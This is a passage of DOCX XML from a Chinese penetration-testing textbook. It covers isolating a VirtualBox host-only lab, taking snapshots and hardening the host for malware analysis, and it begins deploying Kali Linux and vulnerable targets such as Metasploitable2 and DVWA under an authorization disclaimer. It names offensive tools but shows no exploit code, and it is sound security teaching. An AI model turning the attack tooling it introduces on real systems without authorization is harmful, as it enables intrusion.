          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或重装系统。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage snapshot "Metasploitable2" take </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">"前期干净快照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未开始攻击"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是一条你将在本书中反复看到的命令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">所有带有“破坏性”风险的实操步骤，均需拍摄前置快照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这是一种成本极低的“事件响应预案”——蓝队同样依赖系统备份和快照来在遭受勒索软件或数据破坏攻击后快速恢复业务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">宿主机的卫生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：请注意，隔离网络保护了外部不被实验室波及，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">宿主机的安全同样重要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。如果在实验室中运行或分析了真实的恶意软件样本（如从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirusTotal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MalwareBazaar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下载的恶意二进制文件），请务必使用快照，并确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“共享剪贴板”和“拖放”功能在操作恶意样本时关闭（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage modifyvm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">"VM名"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --clipboard disabled --draganddrop disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②），以防止恶意软件通过宿主机与虚拟机之间的通道逃逸。更安全的做法是为恶意软件分析单独创建一个专用于此目的的“空投”虚拟机，同样仅通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络连接，避免使用同一台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机既做渗透又做动态恶意软件分析，以防止工具之间的交叉污染②。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="61" w:name="总结与衔接"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">总结与衔接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至此，我们已经完成了全书实操体系的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">物理根基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：一个使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构建的、受</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式强隔离的虚拟化实验室网络。我们深入剖析了选择虚拟化平台的考量，阐明了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">两种核心网络模式在隔离机制上的本质差异（SNAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单向出向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无网关双向封闭），并亲手执行了从创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">适配器、绑定虚拟机网卡到严格验证连通性与不可达性的全流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验室网络的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">空间是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;LAB_SUBNET&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（本书演示环境默认为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②），这一私有地址段将出现在后续所有靶机单元的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">占位符、Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描命令和漏洞利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的回连地址中。请在你自己的实验笔记或拓扑图中将其固定下来，并标注每台虚拟机的网卡配置（哪一块接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NAT，哪一块接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Only），以避免因遗忘网络拓扑而导致实验中断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们已经拥有了一个密封的“战场”，但战场上还空无一人。下一节（2.2），我们将向这个隔离网络中部署两支关键力量：代表攻击方的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试工作站，以及代表受攻击方的各类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">易受攻击靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Metasploitable2/3、DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等），并为它们拍摄第一个安全存档快照——那是我们发射第一枚“数字弹药”之前的最后一道保险。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="43" w:name="部署攻击机与靶机快照习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署攻击机与靶机·快照·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在动手部署攻击机与靶机之前，请确认已完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟化与隔离网络：实验室的骨架</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的全部配置——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;LAB_SUBNET&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已就绪、攻击机与靶机网卡均已绑定至该网络，且与外部网络物理隔离。正如上一节所述，隔离的“战场”已经建立，现在我们需要向其中引入两支核心力量：攻击方</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与各类脆弱靶机。本节所有命令均在该隔离实验网络内执行，涉及的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编址、子网划分、NAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与桥接原理已在《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章详述，此处直接使用，不再重复讲解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所述全部操作仅限于读者自建的、与生产网络及公网物理或逻辑隔离的虚拟实验环境，或官方授权的靶机平台（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub、HackTheBox、TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）。严禁在未获书面授权的系统上执行任何扫描、连接或渗透命令。实验网络出口应关闭或配置严格防火墙规则，防止攻击流量意外泄露。将实验环境与外部网络隔离是安全研究人员的法律与伦理底线。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="动机攻击机与靶机的角色"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">动机：攻击机与靶机的角色</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从攻击者（红队）视角看，Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是实施侦察、漏洞利用、后渗透等活动的「数字工作台」，预置了大量安全工具，其正确部署和更新是后续所有实操的基础。靶机则是包含故意设计或真实漏洞的应用系统，用于模拟攻击目标。防御者（蓝队）同样可以将这些靶机作为检测与取证演练的对象，例如在靶机上部署日志采集、入侵检测系统，观察攻击流量特征并验证防御策略。因此，本节所述部署不仅是攻击者的起点，也是防御者构建「观察—检测—响应」链路的逻辑前置。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="原理直觉虚拟化与快照的攻防价值"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：虚拟化与快照的攻防价值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟机技术使得单台物理宿主机上可以同时运行攻击机与多台靶机，并通过虚拟网络构成一个闭合的「赛博沙盘」。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">快照（snapshot）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是虚拟化层提供的一种状态冻结机制：它将虚拟机的磁盘、内存、寄存器等状态完整保存，后续可通过一次回滚操作将系统恢复至该时间点。对攻击者而言，这意味着可以在实验后迅速清除破坏性操作（如删库、提权后修改系统配置）带来的残留，保持环境纯净可用于下一次练习。对防御者而言，快照可作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">已知干净基线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，用于在攻击后进行文件完整性校验、日志对比等取证分析，实现“攻击—检测—回滚—改进”的闭环训练。这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节中“最小爆炸半径”原则在靶机管理上的具体落地。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，快照并非万能：它记录的是某个瞬时状态，如果攻击者对系统进行了底层引导或固件级别的修改，快照可能无法完全回滚（取决于虚拟化实现）；未经快照保护的破坏性操作（如误删快照、磁盘加密）可能导致环境不可恢复，因此后文的实操步骤中会明确标出风险操作及快照防护要求。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="48" w:name="攻击机kali-linux-部署与验证"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机：Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署与验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OffSec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">维护的、基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Debian </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的渗透测试发行版。本书后续章节所依赖的几乎所有工具——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">burpsuite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等——均已预装或可通过官方仓库安装。本节以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境为例描述部署过程，VMware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Workstation/Player </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作相似。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="46" w:name="部署步骤"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">获取官方镜像</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">kali.org</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下载预构建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox/VMware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.ova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.vmdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。镜像校验值因版本不同而异，请以官方发布页提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SHA256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为准。切勿从非官方渠道下载，以防植入后门。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">导入虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox：菜单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">File → Import Appliance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，选择下载的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.ova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件，按向导完成导入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">亦可手动创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VM，挂载</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali ISO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安装，但使用预构建镜像更简便。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
